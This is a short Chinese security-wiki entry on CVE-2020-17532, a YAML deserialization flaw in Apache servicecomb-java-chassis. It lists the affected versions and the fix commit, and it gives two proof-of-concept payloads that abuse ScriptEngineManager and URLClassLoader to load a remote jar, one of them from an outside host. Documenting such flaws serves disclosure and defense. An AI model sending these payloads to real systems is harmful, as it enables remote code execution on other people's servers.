menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Vulnerability-棱角社区(Vulnerability)项目漏洞-20210715 chevron_right CVE-2020-17532 Apache servicecomb-java-chassis Yaml 反序列化漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    CVE-2020-17532 Apache servicecomb-java-chassis Yaml 反序列化漏洞.md
    839 B / 2021-05-21 09:14:38
        # CVE-2020-17532 Apache servicecomb-java-chassis Yaml 反序列化漏洞

在servicecomb-java-chassis中启用处理程序-路由器组件时,经过身份验证的用户可能会注入一些数据并导致任意代码执行。

**commit:**

https://github.com/apache/servicecomb-java-chassis/commit/839a52e27c754cb5ce14f20063902f21065bd26c

影响版本:< 2.1.5

**PoC:**

```
!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://127.0.0.1/"]]]]
```

```
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://artsploit.com/yaml-payload.jar"]
  ]]
]
```

ref:

* https://github.com/apache/servicecomb-java-chassis/commit/839a52e27c754cb5ce14f20063902f21065bd26c
* https://seclists.org/oss-sec/2021/q1/60
* https://forum.ywhack.com/thread-115020-1-1.html
    links
    file_download